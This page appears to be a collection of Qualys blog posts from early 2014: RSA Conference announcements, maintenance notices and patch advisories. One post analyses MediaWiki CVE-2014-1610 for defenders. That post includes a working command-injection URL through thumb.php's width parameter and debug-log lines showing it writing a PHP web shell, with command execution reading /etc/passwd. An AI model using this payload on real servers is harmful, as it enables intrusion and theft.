Skip navigation

Qualys Blogs

1,088 Posts 1 2 3 4 Previous Next

To help keep track of what happened at RSA Conference 2014, here's a quick list of Qualys' activities over the week:


Conference Events


New Blog Posts from Qualys Community

SSL Labs: Testing for Apple's TLS Authentication Bug: Updates to SSL Labs let you test for this newly-discovered (and now patched) bug.

MediaWiki DjVu and PDF File Upload Remote Code Execution Vulnerability: Deep-dive into only the third remote code execution vulnerability ever found to affect the MediaWiki platform.



QualysGuard Continuous Monitoring enables customers to continuously monitor mission-critical assets throughout their perimeter and immediately get alerted to anomalies that could expose them to cyber attacks.



QualysGuard Web Application Firewall offers rapid deployment of robust security for web applications with minimal cost of ownership, and is constantly updated with new rules to keep up with application updates and newly emerging threats.



Top 4 Security Controls helps organizations quickly determine if the PCs in their environments have properly implemented the Top 4 Critical Security Controls, which the Council on CyberSecurity estimates can help companies prevent 85% of cyber-attacks. The Top 4 Security Controls are released in collaboration with the SANS Institute and the Council on CyberSecurity.



2014 SC Magazine Awards




  • Risk I/O: For businesses that need to understand the vulnerability and threat risks of their organization’s perimeter in real-time, the new integration enables them to sync their vulnerability data with Risk I/O’s threat processing engine, allowing organizations to gain visibility into their most likely vector for a breach.
  • AlgoSec Partners: The integration provides visibility into the risk levels of data center applications, enabling IT and security teams to effectively communicate with business stakeholders so they can “own their risk” by quickly taking the actions needed to mitigate IT security issues.

scawards2014_winnervert_553993_553994.jpgQualys is proud to announce that it was named Best Security Company earlier this week at the 2014 SC Magazine Awards. The awards acknowledge companies with superior security products that help customers tackle today’s most pressing information-technology (IT) challenges. The announcement was made on February 25, 2014 at the 17th annual SC Awards U.S. Gala in San Francisco, in conjunction with the annual RSA Conference. The criteria for the judging included: product line strength, customer base, customer service/support, research and development, and innovation.


“The SC Awards are the security industry’s most prestigious accolade, bestowed only to the most impressive companies in the security industry,” said Illena Armstrong, VP of editorial, SC Magazine. “Qualys can be very proud of this achievement and the many long hours of dedicated service that it represents.”


“We are honored to be named the Best Security Company by SC Magazine,” said Philippe Courtot, chairman and CEO, Qualys. “We share this honor with our customers and partners, who throughout the years, have been our guiding force to continue improving our existing cloud-based security and compliance solutions and design new innovative ones.”


Qualys also won the award for SC Award for Best Security Company in 2011. Read the full news release.


A new release of QualysGuard Portal, Version 2.3.0, is targeted for release in US production in March 2014. The exact release date has not yet been set.  This release contains changes to the APIs that requires a 30-day notification.  Only the API changes that impact existing APIs are included in the 30 day notification.  The notification will be updated to include any new API functionality at least 15 days prior to release.


AM v1 API Changes


In the Portal 2.3.0 release the VM v1 API will remove the <SITE> and <NETWORK> objects in preparation for the new multiple network support feature. These objects were not used in the VM v1 API and there should be no impact to customers.


Full release notes will be available to customers on the day of the release.


Recently, news about an exploit targeting MediaWiki, the software that powers large-scale websites such as Wikipedia, was made available. What makes it really exciting is the fact that it is only the third remote code execution vulnerability to affect this open-source web platform. Discovered by Check Point vulnerability researchers, this vulnerability, CVE-2014-1610, affects MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11. Because it allows the attacker to compromise the underlying system, it is important to identify and patch affected systems.


Conditions Required to Exploit

Exploiting this vulnerability is tricky, as it is exploitable only under the following conditions:

  1. MediaWiki must have uploads enabled. $wgEnableUploads should be set to true.
  2. File types - .PDF & .DjVu must be allowed via $wgFileExtensions and the PdfHandler extension to be enabled.
  3. The user must be in a group with the "upload" rights. By default this is given to all logged-in users.


Under default conditions (even on older versions) the first two conditions are untrue! MediaWiki versions 1.1 and later have their uploads disabled. That is, $wgEnableUploads is always set to false and permitted file types are png, gif, jpg and jpeg only. DjVu is natively supported since MediaWiki version 1.8. Though file uploads and PhdHandler extensions can be easily enabled.



Figure 1: Configuration page for enabling file uploads


The LocalSettings.php file provides local configuration for a MediaWiki installation.



Figure 2: Configuration file, showing that uploads are disabled by default


How the Exploit Works

The vulnerability exists in the PdfHandler_body.php and DjVu.php source files, which fail to sanitize shell meta-characters. Shell meta-characters are special characters in a command that allow you to communicate with the Unix system using a shell. Some examples of shell meta-characters are the opening square bracket [, backslash \, dollar sign $, pipe symbol |, question mark ? and asterisk or star *.


MediaWiki does have a function, wfEscapeShellArg(), to specifically escape such input. But in an apparent programming error, it fails to escape input received via certain parameters such as height and width that are generated while creating a thumbnail of the uploaded file. If file uploads and the PdfHandler extension are enabled, you will be presented with the following screen with an Upload file link in the left column:



Figure 3: Example of MediaWiki page with file uploads enabled



After uploading a .PDF file, the thumb.php source file is used to create a thumbnail and resize images that are used when a web browser requests the file. The PdfHandler is a handler called by thumb.php for viewing PDF files in image mode. You can call it with the width, height, etc. parameters to manipulate the thumbnail directions:



Figure 4: An example of a thumbnail created by thumb.php



Thumb.php actually interfaces extensions to various handlers. This is the key to this vulnerability: simply by passing shell meta-characters to this source file, you can compromise the system.


For demonstration purposes, I will be writing a trivial .php shell file, which can execute commands. In Figure 5 below, the highlighted code is where I’m exploiting the width “w” parameter to ‘write’ <?php system(\\$_GET[ cmd]);"> into images/backdoor.php file.



Figure 5: Exploit in action



Choosing a directory with relevant permissions is of importance here. In this case, we have written the shell in the /images folder:



Figure 6: Directory with backdoor.php installed by the attacker



Now you can run a command of your choice:



Figure 7: Oh no! The attacker can read the /etc/password file



What’s going on in the background?

MediaWiki has a very robust debugging environment that helps you debug anything – SQL errors, server errors, extension errors, etc. In this case, to understand what goes on behind the scenes, we simply add the following line to the LocalSettings.php file.


$wgDebugLogFile = “/tmp/debug.log”;


When you set this directive, you see all that MediaWiki does behind the scenes. This event is of particular importance to us:


Start request GET /mediawiki/thumb.php?f=Aisb08.pdf&w=400|%60echo%20%22%3C?php%20system(\\$_GET[cmd]);%22%3Eimages/backdoor.php%60




HOST: localhost






FileBackendStore::getFileStat: File mwstore://local-backend/local-thumb/4/41/Aisb08.pdf/page1-400|`echo "<?php system(/$_GET[cmd]);">images/backdoor.php`px-Aisb08.pdf.jpg does not exist.




User: cache miss for user 1


User: loading options for user 1 from database.


User: logged in from session


File::transform: Doing stat for mwstore://local-backend/local-thumb/4/41/Aisb08.pdf/page1-400|`echo "<?php system(\\$_GET[cmd]);">images/backdoor.php`px-Aisb08.pdf.jpg


PdfHandler::doTransform: ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 -dBATCH -dNOPAUSE -q '/var/www/mediawiki/images/4/41/Aisb08.pdf' | 'convert' -depth 8 -resize 400|`echo "<?php system(\\$_GET[cmd]);">images/backdoor.php` - '/tmp/transform_d386f8960888-1.jpg') 2>&1


wfShellExec: /bin/bash '/var/www/mediawiki/includes/' '('\''gs'\'' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 -dBATCH -dNOPAUSE -q '\''/var/www/mediawiki/images/4/41/Aisb08.pdf'\'' | '\''convert'\'' -depth 8 -resize 400|`echo "<?php system(\\$_GET[cmd]);">images/backdoor.php` - '\''/tmp/transform_d386f8960888-1.jpg'\'') 2>&1' 'MW_INCLUDE_STDERR=;MW_CPU_LIMIT=180; MW_CGROUP='\'''\''; MW_MEM_LIMIT=307200; MW_FILE_SIZE_LIMIT=102400; MW_WALL_CLOCK_LIMIT=180'


Here you see that MediaWiki is trying to see if the thumbnail exists or not. Then the PdfHandler is called in with the “–resize 400” parameter to create an image whose width is 400. Then wfShellExec ends up writing the injected PHP shell in the /var/www/mediawiki/images/ folder.


End of story!


QualysGuard uses the BlindElephant engine to detect this vulnerability, using a method called static file fingerprinting to detect web application versions. BlindElephant is a fast, accurate, and very generic web application fingerprinter that identifies application and plugin versions via static files. A whitepaper containing more information about this static file fingerprinting technique can throw more light on this concept. However, it should be noted that the BlindElephant engine included in QualysGuard is an advanced version and has a few more features than the one available publicly.


How to Protect your MediaWiki Systems

What can you do to protect yourselves from such attacks?


The Apache process should be configured only with a 'read only' file access. Ownership and write permissions should be assigned to a separate user. For example, on many systems the Apache process runs as www-data:www-data. This www-data user should be able to read all of the files in your MediaWiki directory either by group permissions or by "other" permissions. It should not have write permissions to the code in your MediaWiki directory. If you use features of MediaWiki which require the "files" directory, then give the www-data user the permission to write files only in that directory.


Among other steps, be sure to follow the MediaWiki security recommendations. Additionally, the MediaWiki Security Guide is a more comprehensive guide to set up your own MediaWiki server and write secure PHP and Javascript code that is easy to review and audit.


Qualys customers with VULNSIGS-2.2.644-1 and onwards will be alerted of this vulnerability via QID: 12832 - MediaWiki DjVu and PDF File Upload Remote Code Execution Vulnerability. Customers are advised to upgrade to MediaWiki versions 1.22.2, 1.21.5, 1.19.11 or later to remediate this vulnerability.


Earlier today I gave a presentation at RSA Conference 2014 in San Francisco about the 20 Critical Security Controls (CSC) and some ideas on how to implement them using QualysGuard. The document for the 20 CSC provides a number of suggestions for each control, called Quick Wins that point out aspects of the controls that are relatively easy to implement. One example is the detection of new machines, or how to report on machines that do not run an approved version of the operating system.


The presentation looks at how QualysGuard data can be used to answer these questions. We show how a script can access the QualysGuard API to pull down data and populate a database in a format that is then easily used to output the relevant reports. In our example we use Splunk as the database, mainly for its ease to treat time-based data, its intuitive query language and built-in reporting, alerting and graphing capabilities.


Attach please find the presentation. I would be very interested in hearing from you, especially if you have used solutions such as Splunk to enhance your reporting.


This week at RSA Conference 2014 in San Francisco, Qualys announced the general availability of QualysGuard Web Application Firewall.


QualysGuard WAF is designed to be *the* simple, scalable way to defend your web applications. Using virtual appliances running in either Amazon EC2 or VMware's vCenter platform, QualysGuard WAF sensors (which analyze traffic to and from your applications) can be deployed rapidly with a minimal level of security expertise. It uses a new approach to strong web app security that evolves and adapts to the changing threat environment.


New Approach: Describe Desired Security, Let the WAF Build the Rules


QualysGuard WAF can be configured and deployed in a matter of minutes in a true highly-available fashion - active/active cluster nodes are the norm, rather than the exception - and can be scaled horizontally to meet the needs of your organization and infrastructure.  Unlike other web application firewalls that require intricate sets of rules be specified for each app, QualysGuard WAF lets you define your desired level of security with just a few clicks. These security goals are automatically translated into the appropriate rules to use within the WAF sensor.


Figure 1


This not only makes robust security easy to set up, it also enables the protection of your applications to improve over time – without any extra effort from you. Qualys’s global security research team is constantly coming up with better defenses - these ongoing enhancements are deployed each month and urgent updates are added as needed to combat new exploits found in the wild. These additions are automatically used by QualysGuard WAF to dynamically update the rules used by each sensor.


Visual dashboards for an easy overview and interactive drill-down


QualysGuard WAF makes it easy to understand the security of all your applications at once. A concise, visual dashboard summarizes the various events that have occurred, when they took place, and where they came from to help you spot unusual patterns.


Figure 2


QualysGuard WAF categorizes each potential threat it detects according to a variety of attributes, including: the apps affected, severity, geographic location, source network address, how the threat was handled, and more. Interactive filters help you search for unexpected activity and determine how it impacts your applications.


Figure 3


You can then drill into particular events to learn more about them and how to address them:


Figure 4


We’re very excited to be making QualysGuard WAF generally available. We’re also continuing to enhance its feature set, driving more and better interaction with your WAS results and to provide better, more actionable security data to your teams.  We're in Booth 2821 in Moscone North - please feel free to stop by to discuss WAF, your needs, and to walk through our service and see how it truly is groundbreaking in scope.


In collaboration with the SANS Institute and the Council on CyberSecurity, Qualys today announced a new free service to help organizations implement the Top 4 Critical Security Controls to fend off attacks. The new service, available at, helps organizations quickly determine if the PCs in their environments have properly implemented the Top 4 Critical Security Controls, which the Council on CyberSecurity estimates can help companies prevent 85% of cyber-attacks.


Qualys will unveil this free service with representatives from the SANS Institute and the Council on Cyber Security at the RSA Conference Booth #2821 today at 11:30 am PT.


"The Qualys Top 4 service is an extremely elegant and effective solution that helps both small and large businesses determine how resilient they are to today's advanced threats,” said Jonathan Trull, CISO for the State of Colorado. “This is exactly the type of public-private partnership our country needs to address the cyber attacks threatening our economy and critical infrastructure."


“This is the first time that a major security vendor has implemented a scoring and reporting algorithm that allows organizations to compare themselves with peers,” said Alan Paller, director of research for the SANS Institute. “Scoring like this is the only technique I have ever seen that causes organizations to implement the changes that lead to effective security.”


Read the full announcement.


Today at RSA Conference, Qualys announced its new Continuous Monitoring service, empowering customers to continuously monitor mission-critical assets throughout their perimeter and immediately get alerted to anomalies that could expose them to cyber attacks. The service gives organizations the ability to proactively identify threats and unexpected changes in Internet-facing devices within their DMZ, cloud-based environments, and web applications before they are breached by attackers, bringing a new paradigm to vulnerability management.


"At, we have millions of visitors per month and many perimeter devices that we operate to secure against possible attacks,” said Deal Daly, VP of information technology for “The Qualys Continuous Monitoring service delivers real-time alerts of security and network configuration issues that we can proactively remediate.”


“The Cloud is expanding the boundaries of the corporate perimeter to include every browser, device or application that touches the Internet, leaving us more exposed to cyber-attacks than ever,” said Philippe Courtot, chairman and CEO for Qualys. “With our groundbreaking Continuous Monitoring service, companies can see their perimeter the way today’s hackers do, so that threats can be identified and addressed before they turn into breaches.”


Read the full release.


Qualys also announced today the general availability of its QualysGuard Web Application Firewall (WAF) service for web applications running in Amazon EC2 and on-premise. Deployed as a virtual image alongside web applications, the QualysGuard WAF can be set up and configured within minutes, enabling organizations to easily provide protection for their websites.


“Companies today are challenged with protecting their websites against attacks and complying with the Payment Card Industry (PCI) standard for transactions on their sites. But many organizations, especially smaller businesses, do not have the expertise or resources to effectively deploy WAFs,” said Charles Kolodgy, Research VP at IDC. “By introducing a lower cost, easy-to-use and deploy WAF cloud solution, Qualys can aid organizations in improving protection of their websites and web applications.”


The QualysGuard WAF cloud service provides rapid deployment of robust security for web applications with minimal cost of ownership, and it is constantly updated with new rules to keep up with application updates and newly emerging threats.


“Large organizations typically have thousands of web applications to protect, while smaller businesses don’t have the resources and IT staff to protect them,” said Philippe Courtot, chairman and CEO for Qualys. “The general availability our WAF service will offer customers the flexibility they need to protect their applications no matter where they reside and whether they have a few or thousands of them.”


Read the full announcement.


Risk_I_O_Logo.pngRisk I/O announced today that it has partnered with Qualys to integrate QualysGuard Vulnerability Management (VM) into Risk I/O, providing perimeter vulnerability scanning for its customers. For businesses that need to understand the vulnerability and threat risks of their organization’s perimeter in real-time, the new integration enables them to sync their vulnerability data with Risk I/O’s threat processing engine, allowing organizations to gain visibility into their most likely vector for a breach.


“The addition of perimeter scanning to Risk I/O enables organizations to scan their organization’s perimeter and receive a complete risk analysis in a one stop shop so they can take action quickly and lower their risk of a breach,” said Risk I/O Co-founder and CEO Ed Bellis. “We are pleased to partner with Qualys and integrate our solutions together giving customers a comprehensive solution that will ultimately help them become more secure and avoid data breaches.”


Read the full announcement.


On Friday, Apple released patches for iOS 6.x and 7.x, addressing a mysterious bug that affected TLS authentication. Although no further details were made available, a large-scale bug hunt ensued. This post on Hacker News pointed to the problem, and Adam Langley followed up with a complete analysis.


I've just released an update for the SSL Labs Client Test, which enables you to test your user agents for this vulnerability.


This bug affects all applications that rely on Apple's SSL/TLS stack, which probably means most of them. Applications that carry with them their own TLS implementations (for example, Chrome and Firefox) are not vulnerable. For iOS, it's not clear when the bug had been introduced exactly. For OS X, it appears that only OS X 10.9 Mavericks is vulnerable.


What you should do:

  • iOS 6.x and 7.x: Patches are available, so you should update your devices immediately.
  • OS X 10.9.x: Apple promised a fix would be available soon. Update as soon as it is released. The vulnerability has been fixed in 10.9.2. Update immediately. 

A new release of QualysGuard, Version 7.13 will be available in production on QualysGuard US Platform 1 on March 6, 2014. The deployment is scheduled to coincide with the currently scheduled maintenance window QualysGuard US Platform 1 Maintenance Notification: March 6, 2014. The release will occur between the hours of 12:00 PM Pacific (20:00 UTC) and 0:00 AM Pacific next day (8:00 AM UTC next day).


QualysGuard VM and PC version 7.13 includes the following features:

Vulnerability Scorecard Report updates, New Compliance Scorecard Report, MS SQL Authentication – Auto Discover Database Instances, and multiple API enhancements (Ability to download API v2 CSV reports without headers, New HTTP Authentication options, New "Policy Merge” feature,  Policy Report XML now includes custom control references, Apache Authentication Support for multiple instances per host)


See QualysGuard 7.13 New Features and QualysGuard® 7.13 API Notification - 15 Day for more details.


To continue to receive notifications by email, please subscribe at US Platform 1


Qualys regularly upgrades the QualysGuard Cloud Platforms for capacity expansion and maintenance purposes.


We are now ready for a maintenance that will allow Qualys to apply database and network enhancements to the EU Platform.


This upgrade will happen on March 13, 2014 and requires a 12-hour downtime starting at 19:00 UTC (8:00pm CET) and ending at 07:00 UTC (8:00am CET) next day.


Please note that none of the QualysGuard services on the EU Platform will be available during this maintenance window.  This includes:

  • QualysGuard Vulnerability Management
  • QualysGuard Policy Compliance
  • QualysGuard Wep Application Scanning
  • QualysGuard Malware Detection Service
  • QualysGuard Asset Management, including Dynamic Asset Tagging


Any scans scheduled to begin during the downtime will start immediately following the scheduled downtime. Customers are advised to make sure that the restart of scheduled scans after the downtime does not interfere with normal network operations.


If your account has been enabled with New Scanner Services, your running scans will not be interrupted by this downtime and the results will be processed after service is returned.  If your account has not been enabled with the New Scanner Services, then any scans running at the start of the scheduled downtime will be canceled.


We appreciate your patience and if you have any further questions regarding this upgrade, please feel free to contact Qualys Technical Support at or +44 (0)1753 872102 (UK) or +33 1 41 97 35 81 (France) or +1 (866) 801-6161 (US and Canada).


We thank you for your continued support and look forward to your feedback.

Today Adobe released their second out-of-band update for Adobe Flash this month. APSB14-07 fixes three vulnerabilities in Adobe Flash, including CVE-2014-0502 which is being used in the wild to attack users through malicious webpages. The 0-day flaw in Flash CVE-2014-0502 was discovered about a week ago by FireEye which states that it was found on three websites that are run by non-profit institutions. Fortunately organizations that are running latest operating systems and application code are not affected by the attack. They lack the vulnerable components that enable the attack to come to a successful conclusion.


In particular the attack needs to bypass ASLR to be successful and therefore only focuses on certain configurations:


  • Windows XP (which does not have ASLR)
  • Windows 7 with Java 1.6 installed, which allows for an ALSR bypass, but Java 1.6 is EOL already and in general vulnerable to other exploits
  • Windows 7 with a not fully updated version of Office 2007 or Office 2010, also vulnerable to other exploits


Our recommendation is to update as quickly as possible. Organizations that run any of the above organizations needs to do this as quickly as possible, others can roll out this patch on a normal schedule, but need to be aware that attackers may switch their tactics at any time to abuse other software packages that also leak memory locations.


Microsoft has updated advisory KB2755801 which centralizes the Flash updates in Internet Explorer 10 and 11. Users of IE10 or IE11, as well as Google Chrome do not need to update Adobe Flash separately, but instead it is handled through their browsers automatically.

Posted by qualys on Feb 19, 2014 in Qualys News

AlgoSec Partners with Qualys

44190_LogoAlgoSec.jpgAlgoSec, the market leader for Security Policy Management and Qualys today announced their partnership to enable businesses to manage security and risk across their organizations. With the partnership, the latest version of the AlgoSec Security Management Suite includes integration with QualysGuard Vulnerability Management (VM) to aggregate and score vulnerabilities associated with data center applications and their associated physical or virtual servers. This provides customers with unprecedented visibility into the risk levels of data center applications – even as they change - enabling IT and security teams to effectively communicate with business stakeholders so they can “own their risk” by quickly taking the actions needed to mitigate IT security issues.


“Today’s cyber-attacks have a direct impact on the bottom line, yet organizations lack the visibility to manage risk from the business perspective,” said Yuval Baron, Chairman, President and CEO, AlgoSec. “By integrating QualysGuard VM with our solution, we are changing this paradigm to provide application-centric vulnerability management, allowing organizations to manage security in the context of business and at the speed of business.”


The AlgoSec Suite, with application-centric vulnerability management is available immediately. The new solution will be demonstrated at RSA at AlgoSec’s booth #427.


To learn more about this solution, join us for a webcast on March 12 at 1pm ET on Managing Risk and Vulnerabilities in a Business Context. Read the full news release.


Update 2: Microsoft just published KB2934088 which acknowledges the vulnerability in Internet Explorer 9 and 10 and publishes a Fixit, that uses the MSHTML Shim mechanism to patch Internet Explorer. MSHTML Shim was originally developed for application compatibility, but has been successfully used for a number of security problems in the past year. Microsoft has a post at their SRD blog that explains vulnerable versions, plus the defensive options available.


Update: It seems both Internet Explorer 9 and 10 are affected. That equates to a large share of all users, just over 30 %. Implementing EMET makes a lot of sense, since it has deflects this attack and has countred last year the known 0-days of this type last as well.


Original: On Patch Tuesday, when Microsoft released new versions of Internet Explorer (6-11) addressing 24 vulnerabilities, FireEye detected a previously unknown attack on IE10 at the website of the Veterans of Foreign Wars ( The attack is using a Adoeb Flash Object to setup the environment for the rest of the exploit. Currently this 0-day vulnerability (CVE-2014-0322) only applies to Internet Explorer 10, other versions are not affected. EMET, as many times during the IE 0-days of last year, is also successful in preventing the exploit from running successfully, but this time because it actually checks for its presence and aborts if EMET is found.


Stay tuned for more updates.